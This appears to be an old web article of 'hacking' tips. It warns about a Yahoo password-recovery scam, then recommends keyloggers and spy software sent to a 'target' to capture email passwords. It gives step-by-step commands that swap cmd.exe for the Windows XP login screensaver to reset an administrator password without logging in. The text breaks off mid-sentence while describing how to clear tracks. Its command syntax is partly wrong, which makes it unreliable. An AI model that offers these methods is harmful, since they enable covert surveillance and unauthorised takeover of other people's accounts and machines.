SCAMS - BEWARE OF THEM

Many people till now has been a victim to this by sending their passwords hoping that they will retrieve a targeted account:

Log into your yahoo email account and send a mail to recoversecretcode@yahoo.com after which the server will send you the forgotten password. Then in the subject line, type the word password retrieve etc.

This is a real scam as the only way o recover a forgotten password is to going to the account and clicking “forgot your password” option which will as you for authentification before resetting the password. In yahoo, they would ask you a secret question you have set at the time of creating you id thereafter your password will be emailed to your alternate account mentioned at the time of sign up.

There are scammers who ask for money to do this job who are just fooling you with this.

HACKING OF YAHOO, HOTMAIL AND LYCOS ETC.

The most widely used hacking offered is in email passwords of Yahoo!, Hotmail, Gmail, AOL, Lycos and many more. Most of them are scams while some are real good. The most common and successful method is by using key loggers to record email passwords and computer surveillance software’s. There are a lot of monitoring software’s or key loggers available e.g. 007, remote spy, netvizor, email spy, chat spy, specter pro, eblaster, invisible key logger etc. This software’s create a self extracting file that you can run in the computer for surveillance or mail it to your target. These are also used to monitor a Childs computer activity or employees in the office. Also it should be kept in mind that these software’s have not been created to invade in someone’s privacy and hence, while using it you should behave as a responsible user.

A way to hack someone’s id is by trusting a genuine person, asking him for screenshots of the inbox, sent items or the address book which again is not suggested as it is entering into someone else’s privacy no matter how you get it.

HACKING OF WINDOWS XP ADMIN PASSWORD

This is a nice one where you need log into your DOS command prompt and enter the following code:

cd\

cd\windows\system32

Mkdir tem hack

Copy logon.scr temphack\logon.scr

Copy cmd.exe temphack\cmd.exe

Del logon.scr

Rename cmd.exe logon.scr

Exit

This tells the windows to backup the command program and screen saver file. Then the settings have been edited so that as soon as windows load the screen saver, you get an unprotected DOS prompt without logging in. When this all is done, enter the command “net user password” which will help you to change the password. E.g. if the admin user’s name is Peter and you wish to have a password of 9876 then type “net user password Peter 9876″ and the password would change to 9876. For clearing your tracks, copy the
